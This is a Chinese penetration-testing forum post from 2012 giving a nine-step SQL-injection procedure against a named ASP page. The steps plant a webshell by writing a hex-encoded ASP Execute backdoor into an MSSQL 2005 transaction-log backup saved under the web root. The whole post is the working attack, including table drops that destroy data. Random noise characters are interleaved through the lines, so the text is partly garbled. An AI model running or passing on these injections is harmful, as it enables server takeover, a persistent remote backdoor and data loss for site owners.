中国网络渗透测试联盟

标题: Mssql2005 Log备份Webshell [打印本页]

作者: admin    时间: 2012-9-15 14:25
标题: Mssql2005 Log备份Webshell
第一步
. J' s. Y; j3 h6 O6 a7 Ahttp://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--
+ n7 y! y8 y8 i4 l) q2 [1 X$ `! u
; t% ~6 j$ D; Z% l第二步:
3 M/ u% C0 ~- Phttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--: S2 v8 i) M0 G) B4 O
0 }$ U- w* X9 P+ m4 E3 t
第三步
3 T2 @0 Y) [8 s: C6 Mhttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
+ D2 |1 A+ J6 h3 R# O
1 I' G5 ]9 s1 n5 u  q! V第四步1 I1 P2 V8 W" ~# Q6 A$ c- k$ n) M
http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--
* r5 l* V$ y7 l, |7 w& g; p5 M% |5 O: m  b7 v3 d. _' N9 ?
第五步7 q; r' H5 O* U
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
9 q$ k4 I" E, d+ k$ d$ t: B4 B. i" J* M% M  p. }. e1 W
第六步& u* a  c. X4 D& ?4 f: t, i" _/ w
http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--# b4 k5 {" c  X! A' M' _

, T! ^1 h, E8 O& X- D第七步* V/ n0 \! f8 v: A
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--# }6 k9 `% P. _2 ]+ z2 v

8 O3 `% n* Q3 q  P( R; q第八步+ p+ ^& `+ P* C# K* C( ?
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
$ P  i* @7 D0 m8 E. b+ o3 L: _/ @/ f$ l2 F% w7 O$ x
第九步+ M7 h+ ~6 O3 p! y) X
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
7 {7 _" T8 h* C+ |& P" p0 q9 p




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2